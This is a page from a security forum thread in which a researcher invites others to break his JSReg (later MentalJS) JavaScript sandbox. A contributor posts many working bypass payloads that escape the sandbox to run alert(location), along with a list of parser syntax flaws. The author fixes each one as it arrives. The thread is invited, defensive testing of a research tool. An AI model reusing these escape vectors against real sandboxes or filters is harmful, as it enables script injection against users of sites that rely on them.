Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...345678910111213Next
Current Page: 12 of 13
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: September 21, 2011 07:29PM

So I thought about supporting line/para etc and rewriting all my \s but then I decided to cut corners and normalize all spaces and new lines. Literal characters will be replaced but escaped ones should be allowed. Thanks again!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: September 21, 2011 10:48PM

I suggest to add these non-FF spaces \u202f, \u205f to spaceChars regex
and do something with literal characters \u1680,\u180e,\u0085 (spaces in IE6-8) and \u0000,\ufffe \ufeff during normalization.

bugs:

1. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#196

2. variable regex has an invalid structure: /(?:[^\x00-\x7f[ \f\n\r\u000b\u2028\u2029]+...

3. this['f$oo']=1;'$f'+'oo' in this; // here must take into account the priority of operations

----------------------
~Veritas~



Edited 7 time(s). Last edit at 09/25/2011 07:52PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: September 26, 2011 06:25AM

Thanks!

I've normalized those spaces and fixed the variable regex. The first bug is fixed but now toString/valueOf etc appears in the for loop so you have to use hasOwnProperty if you want to remove them from your code, to fix this I'll probably have to get the object the for loop is on and pass it to the function and same goes for the 3rd bug I need to know the indented object of "in" or somehow rewrite prop checks with $ automatically.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: September 27, 2011 04:04PM

1?{}:/='lo/,alert(parent.location)//'
~{x:/='/,lo:alert(parent.location)}//'

----------------------
~Veritas~



Edited 2 time(s). Last edit at 09/27/2011 04:12PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: September 28, 2011 07:10AM

I'm quite embarrassed with this one :O, I knew when I modified the code to combine it with operators I'd forget something. The regex didn't check for colon and the operators didn't check if there was something left. So now I add the colon to the regex check and updated the operators check. Amazing skill with the exploit though since you realized all of the above :)

Update....
I've updated the operators completely and now done some detection for ++ and -- hopefully there won't be any new bugs but you never know I might have missed the obvious because of the new code.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/29/2011 11:43AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: September 30, 2011 09:12AM

0?/='lo/i:alert(parent.location)//'

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: September 30, 2011 01:32PM

Thanks again, clever! I've fixed it, I forgot about ternary for some reason I don't remember removing it from regexes but there you go.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: October 03, 2011 03:41PM

0?lo:/='/,alert(parent.location)//'

switch(1){case 1:{}/'lo/,alert(parent.location)}//'}  // default:{} <-- the same

bugs:

1.
i=1;i++
{}

2. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#612

3. ~{}

----
// I stopped to think about it, but the ideas still come to me.

Preventing future bypasses via unsupported statements.

When browsers will implement ES6 features, it will open some holes in the JSReg's parser. To fix this it's necessary, for example, save the protection ('$') in names for 'correctedOutput'.

To test this right now on FF (2+) I changed one line of JSReg.

iframe.contentWindow.document.write('<script type="text/javascript">' + code + '<\/script>');

// to

iframe.contentWindow.document.write('<script type="application/javascript;version=1.7">' + code + '<\/script>');

Obviously , these features will be available for "text/javascript" type with time.

// FF
with({'let':function(){}})let(i=1)/'/;/*';alert(window[1<!--i),('location'
]);/lo*/

!function(){with({'yield':1})yield/'/;/*';alert(window[1<!--0[0]),('location'
]);/lo*/}()

Test: [olo-olo-lo.narod.ru]

----

Quote

can you explain why this is a bug?

parseTree.push("RegExps(" + output + ")"); // <-- 'output' instead of 'regexOutput'. You've already corrected it.


----

Until the spring.

----------------------
~Veritas~



Edited 5 time(s). Last edit at 10/14/2011 06:31AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 13, 2011 09:31AM

Damn thanks!

I think I better modify the states used into a whitelist approach for regex and divide.

Update...
Ugh, yeah all these new features are hard to tame. I wish you could down version them too, disable e4x etc I'll think about this. I'm working on the changes now.

Update++
Ok fixed those. I now force object literals when JSReg detects them. So x={} will become x=({}), I've added the version number for the script tag and now the corrected output has rewritten objects. Fixed those syntax bugs too.

Quote

2. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#612

Please can you explain why this is a bug? I looked but I didn't understand your point since the regex parser is checking for the ending "/" and then looks for either img if neither character exists then it ends the regex parsing.

Quote

parseTree.push("RegExps(" + output + ")"); // <-- 'output' instead of 'regexOutput'. You've already corrected it.

LOL Well I corrected but unrelated to your post after noticing the output was wrong, then checked it afterwards and thought it was to do with the bit above that doh. It was 2am so I guess I confused myself and fixed it subconsciously.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 10/15/2011 04:54PM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: November 10, 2011 11:28AM

Has it finally beat master lever one? Or are your excellent javascript martial art skills being fine tuned elsewhere?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: November 11, 2011 07:26AM

As I said above, I'll return to JSReg in March or April of 2012, I want to finish my look too, but I'm busy.

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: November 11, 2011 09:47AM

Ah sorry missed that, thanks for your hard work! I really appreciate it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: February 25, 2012 04:29PM

if(1)/**/{}/'//*'+function{1:lo}/'/,alert(parent.location))//*/-/'/
lo='@mozilla.org/js/function'; 
1<!--0[0];alert(lo: :['location']);

`if(1)/**/` and `<!--` are just some of the options to hide the wrong code at the stage of initial syntax checking. For this purpose can be used most of the violations listed in the next post.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 02/25/2012 07:45PM by LeverOne.

Options: ReplyQuote
Current syntactic violations in JSReg
Posted by: LeverOne
Date: February 25, 2012 06:40PM

In this post I will list all incorrect changes in the original code (syntactic violations), which exist in the current version of the JSReg.

You can edit this post.

1)

this['f$oo']=1;'$f'+'oo' in this; // here must take into account the priority of operations

2)

switch(1){case 1:{} // <-- should be parsed as a block.
}

3)

switch(1){default:{} // <-- should be parsed as a block.
}

4)

if(0)/**/{} // <-- should be parsed as a block or f/statement (if it's a function)
else/**/{}
switch(0)/**/{default:0}
while(0)/**/{}
do{}while(0)/**/{}
for(;0;)/**/{}
with(0)/**/{}

5)

for(a in [])/**/{} should be equivalent to for(a in []){}

6)

return
{} // should be parsed as a block.

return /i/
{}

return /i/
a=1


for(;0;)continue
{}

for(;0;)break
{}


for(;0;)continue
a=1

for(;0;)break
a=1

x:for(;0;)continue x
/i/i // <-- reg.exp.

x:for(;0;)break x
/i/i


7)

i=1;
i+++i

i=1;
i++ +i

i=1;
i
+++i

8)

1.instanceof Number

1.E10

1 . E10
1 .E10
1. E10

1.[0]

1..x

9)

0[0]-->1

10)

for(;{}*0;)0
for(;function(){}*0;)0

for(;0;{})0

11) This problem can be fixed in the least, otherwise there may be breaks.

x:{} // well known but incorrect

if(0)function x(){} // etc

12)

var x=function(){'blalba'},z
(y)=1

13)

x=eval(1)
+1

14) `?:` takes special attention

0?{}/i:0 // look at parse tree



to be continued...

----------------------
~Veritas~



Edited 10 time(s). Last edit at 03/03/2012 02:51PM by LeverOne.

Options: ReplyQuote
Re: Current syntactic violations in JSReg
Posted by: Gareth Heyes
Date: February 27, 2012 08:27AM

Wow :D

I really thought it would be hard for you to find a new bypass, this is sooooo cool. I'll rewrite JSReg to take into account these syntax mistakes and make the code better. Thanks!!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Current syntactic violations in JSReg
Date: February 28, 2012 02:46PM

I'll add one that I found a while ago but did not yet have time to explore:

/./iiin({}) // Chrome only

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: Current syntactic violations in JSReg
Posted by: Gareth Heyes
Date: April 02, 2012 03:22AM

Working on a complete rewrite, thanks for the great vectors! This convinced me that I need to have my own error checking and redo how I handle parenthesis etc. I dunno how long it will be since I have other work to do :( but should result in better code

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 18, 2012 07:30AM

I wrote a new parser

[www.thespanner.co.uk]

I've checked it against previous attacks and the syntax problems list from lever one. I should be in a better position to fix issues now since I can match paren expressions and object literals etc more easily.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 10/18/2012 07:30AM by Gareth Heyes.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: October 18, 2012 10:05PM

Thank you! Soon I will look in detail at the new sandbox. At the moment I have three suggestions:
1. Run hack test on Opera or GC.
2. Do something with "<!--" and "-->".
3. Upload MentalJS on googlecode.

----------------------
~Veritas~

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: October 19, 2012 01:54AM

1. Doh. I've fixed the var statement stuff by adding it to current expression tracking.
2. Yeah ooops I need to sort that
3. Any reason you need it there? Easier for looking at code? I didn't get any code contributions from anyone last time so I didn't bother.

Update...
You might want to wait until I fix a lot of things :) need to restructure how function statements, function expressions and paren expressions work.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/19/2012 10:50AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: October 22, 2012 06:38AM

// Any reason you need it there?

I often compare the version to exactly understand how the problem has been fixed. Sometimes I add my code to see how the input data is overwritten. Sometimes I leave in the code my notes to remember in the future.

// You might want to wait until I fix a lot of things

ОК. I see the var statement fix was not complete. I follow this thread.

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 22, 2012 07:32AM

Fair enough I'll upload to google code, what license do you prefer? I consider you an owner of this project too since without you it would be nothing.

BTW your tests are amazing, have you considered releasing a js parser test suite? The edge cases are really really tricky to parse and a lot of other parsers have problems.

There is a new version uploaded now. I'll put it on google code when I get an answer about the license. Please add me on gtalk if you use it gazheyes [removemepleasethisis not needed at gmail dot com

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/22/2012 07:37AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: October 22, 2012 08:32AM

// I consider you an owner of this project

Thanks, but I cann't agree, because I know I'll not be doing commits. Choose a license on your own, please.

// have you considered releasing a js parser test suite

:) In my opinion it's more fun, when "a lot of other parsers have problems".

// add me on gtalk

I don't use gtalk.

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 22, 2012 08:42AM

Quote

:) In my opinion it's more fun, when "a lot of other parsers have problems".

XD

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/22/2012 08:42AM by Gareth Heyes.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: October 23, 2012 02:59AM

function lo(){i//
in/1};alert(location)//1}      // !Opera

var y=function(){},lo          // !FF
/'/,alert(location)//'

this
function lo(){}/'/,alert(location)//'

var NaN
/'/,alert(location)//'      // !FF

Tests:
var i=i
/i/i,a

var x
(x)=123,x
/i/i

var i
{}

----------------------
~Veritas~



Edited 9 time(s). Last edit at 10/23/2012 05:26AM by LeverOne.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: October 23, 2012 05:33AM

Ok arch nemesis I now force divide and regex and =/
Fixed those.

You have a new toy as well, dom api.
b=document.createElement('b');b.appendChild(document.createTextNode('hello world!'));document.querySelector('form').appendChild(b);

Update...
and jQuery :O

1. Hit load jQuery
2. Hit execute
3. $ now contains a reference to a sandboxed jQuery!!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/23/2012 09:29AM by Gareth Heyes.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: October 26, 2012 03:01AM

I'm currently rewriting again but this time not relying on the browser to validate syntax. I'm going to write it all and unable us to define rules and hopefully fix these syntax based attacks. Oh and it should be even faster since I'm now using if statements and very limited amount of functions.

Update...
New version is up:
[www.businessinfo.co.uk]

Google code page:
[code.google.com]

You will notice the parsing is much faster now because I compare the charcodes directly and do a different method of parsing. I haven't got jQuery to work yet and ASI is still incomplete and I'm sure some missing syntax but I have my own validator now.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 11/06/2012 05:12PM by Gareth Heyes.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: November 10, 2012 05:03PM

1<!--0[0];for(var lo
{}/alert(location,i=0)/i<!--lo;);

----------------------
~Veritas~



Edited 1 time(s). Last edit at 11/10/2012 06:48PM by LeverOne.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: November 11, 2012 05:43AM

Niiiiice :) very cool exploit of my asi. I now check the context and insert a for semi instead of semi if require so the { becomes a object literal.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/11/2012 02:00PM by Gareth Heyes.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: November 11, 2012 11:37PM

for(;0;)break
typeof/lo;alert(location)/+0

also continue + new, throw, delete, typeof

----------------------
~Veritas~



Edited 2 time(s). Last edit at 11/11/2012 11:48PM by LeverOne.

Options: ReplyQuote
Pages: PreviousFirst...345678910111213Next
Current Page: 12 of 13


Sorry, only registered users may post in this forum.